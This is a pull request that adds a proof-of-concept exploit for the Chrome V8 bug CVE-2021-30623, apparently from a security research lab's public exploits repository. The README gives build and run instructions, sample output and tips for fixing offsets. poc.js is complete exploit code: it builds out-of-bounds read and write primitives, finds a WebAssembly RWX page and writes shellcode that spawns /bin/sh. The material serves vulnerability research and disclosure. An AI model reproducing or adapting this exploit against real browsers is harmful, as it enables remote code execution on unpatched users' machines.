Merge pull request #438 from github/chrome_itw

Blog material

Author: xcorail

SecurityExploits/Chrome/v8/CVE-2021-30623/README.md

@@ -0,0 +1,61 @@
+## Chrome in-the-wild bug CVE-2021-30623
+
+The analysis of this bug can be found [here](https://securitylab.github.com/research/in_the_wild_chrome_cve_2021_30623). This is a Chrome bug that is reported by an anonymous researcher and was believed to be exploited in the wild.
+
+The exploit here is tested on `v8` version 9.3.345.16 (commit `632e6e7`), which is the version shipped with Chrome 93.0.4577.63, the one before the bug is fixed, on Ubuntu 20.04. I have not tested it on Chrome itself.
+
+To test, check out `v8` at commit `632e6e7` and compile with the default settings using `tools/dev/gm.py x64.release`. Then open the file `poc.js` with `d8`:
+
+```
+./d8 poc.js
+```
+
+On Ubuntu 20.04, it should call `execve("/bin/sh")` to spawn a new process:
+
+```
+./d8 poc.js
+instance: 81d42dd
+elements: 804abd9
+rwx page address: 22c70c88b000
+intArray addr: 8105d79
+intBackingStore: 56498ceb25e0
+$
+```
+
+Shell code may need changing on other platforms.
+
+The exploit is very reliable, however, when testing, I noticed that some offsets appear to be sensitive to small changes in the file (even adding comments may cause problem), which would cause the exploit to fail. This only happens when the file is modified and usually manifests itself with some garbage values of the addresses, for example:
+
+```
+instance: 81d42dd
+elements: 800222d
+rwx page address: 3ff199999999999a
+intArray addr: 81067e1
+intBackingStore: 3ff199999999999a
+```
+
+In the above, address of `rwx page` and `initBackingStore` are clearly incorrect. The root cause seems to be an incorrect `elements` store value. (`800222d` is not a valid value) This can usually be fixed by changing the following lines regarding the address of elements:
+
+```
+function arbRead(addr) {
+  [elements, addr1] = ftoi32(addrs[1]);  //<---- change this to [addr1, elements] = ftoi32(addrs[1]);
+  oobWrite(i32tof(addr,addr1));          //<---- change to   oobWrite(i32tof(addr1,addr));
+  return writeArr[0];
+}
+...
+function writeShellCode(rwxAddr, shellArr) {
+  var intArr = new Uint8Array(400);
+  var intArrAddr = addrOf(intArr);
+  console.log("intArray addr: " + intArrAddr.toString(16));
+  var intBackingStore = ftoi(arbRead(intArrAddr + 0x20));
+  console.log("intBackingStore: " + ftoi(arbRead(intArrAddr + 0x20)).toString(16));
+
+  [elements, addr1] = ftoi32(addrs[1]);              //<------ change this to [addr1, elements] = ftoi32(addrs[1]);
+  oobWrite(i32tof(intArrAddr + 0x20, addr1));        //<------ change this to oobWrite(i32tof(addr1, intArrAddr + 0x20));
+  ...
+}
+...
+var elementsAddr = ftoi32(addrs[1])[0];             //<------- change this to var elementsAddr = ftoi32(addrs[1])[1];
+```
+
+This, however, does not affect the reliability of the exploit as the offsets are stable as long as the file is fixed, but it may cause issues if the poc is modified. I do not know what causes this, but the exploit can probably be made more robust against this by matching patterns in memory instead of relying on fixed offsets.

SecurityExploits/Chrome/v8/CVE-2021-30623/poc.js

@@ -0,0 +1,112 @@
+var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
+var module = new WebAssembly.Module(code);
+var instance = new WebAssembly.Instance(module);
+var main = instance.exports.main;
+
+function foo(y) {
+  x = y;
+}
+
+function oobRead() {
+  //addrOf b[0] and addrOf writeArr::elements
+  return [x[20],x[24]];
+}
+
+function oobWrite(addr) {
+  x[24] = addr;
+}
+
+var arr0 = new Array(10); arr0.fill(1);arr0.a = 1;
+var arr1 = new Array(10); arr1.fill(2);arr1.a = 1;
+var arr2 = new Array(10); arr2.fill(3); arr2.a = 1;
+
+var x = arr0;
+
+var arr = new Array(30); arr.fill(4); arr.a = 1;
+var b = new Array(1); b.fill(1);
+var writeArr = [1.1];
+
+for (let i = 0; i < 19321; i++) {
+  if (i == 19319) arr2[0] = 1.1;
+  foo(arr1);
+}
+
+x[0] = 1.1;
+
+for (let i = 0; i < 20000; i++) {
+  oobRead();
+}
+
+for (let i = 0; i < 20000; i++) oobWrite(1.1);
+foo(arr);
+
+var view = new ArrayBuffer(24);
+var dblArr = new Float64Array(view);
+var intView = new Int32Array(view);
+var bigIntView = new BigInt64Array(view);
+b[0] = instance;
+var addrs = oobRead();
+
+function ftoi32(f) {
+  dblArr[0] = f;
+  return [intView[0], intView[1]];
+}
+
+function i32tof(i1, i2) {
+  intView[0] = i1;
+  intView[1] = i2;
+  return dblArr[0];
+}
+
+function itof(i) {
+  bigIntView = BigInt(i);
+  return dblArr[0];
+}
+
+function ftoi(f) {
+  dblArr[0] = f;
+  return bigIntView[0];
+}
+
+
+dblArr[0] = addrs[0];
+dblArr[1] = addrs[1];
+
+function addrOf(obj) {
+  b[0] = obj;
+  let addrs = oobRead();
+  dblArr[0] = addrs[0];
+  return intView[1]; 
+}
+
+function arbRead(addr) {
+  [elements, addr1] = ftoi32(addrs[1]);
+  oobWrite(i32tof(addr,addr1));
+  return writeArr[0];
+}
+
+function writeShellCode(rwxAddr, shellArr) {
+  var intArr = new Uint8Array(400);
+  var intArrAddr = addrOf(intArr);
+  console.log("intArray addr: " + intArrAddr.toString(16));
+  var intBackingStore = ftoi(arbRead(intArrAddr + 0x20));
+  console.log("intBackingStore: " + ftoi(arbRead(intArrAddr + 0x20)).toString(16));
+
+  [elements, addr1] = ftoi32(addrs[1]);
+  oobWrite(i32tof(intArrAddr + 0x20, addr1));
+  writeArr[0] = rwxAddr;
+  for (let i = 0; i < shellArr.length; i++) {
+    intArr[i] = shellArr[i];
+  }
+}
+
+var instanceAddr = addrOf(instance);
+var elementsAddr = ftoi32(addrs[1])[0];
+console.log("instance: " + instanceAddr.toString(16));
+console.log("elements: " + elementsAddr.toString(16));
+var rwxAddr = arbRead(instanceAddr + 0x60);
+console.log("rwx page address: " + ftoi(rwxAddr).toString(16));
+var shellCode = [0x31, 0xf6, 0x31, 0xd2, 0x31, 0xc0, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x56, 0x53, 0x54, 0x5f, 0xb8, 0x3b, 0, 0, 0, 0xf, 0x5];
+
+writeShellCode(rwxAddr, shellCode);
+main();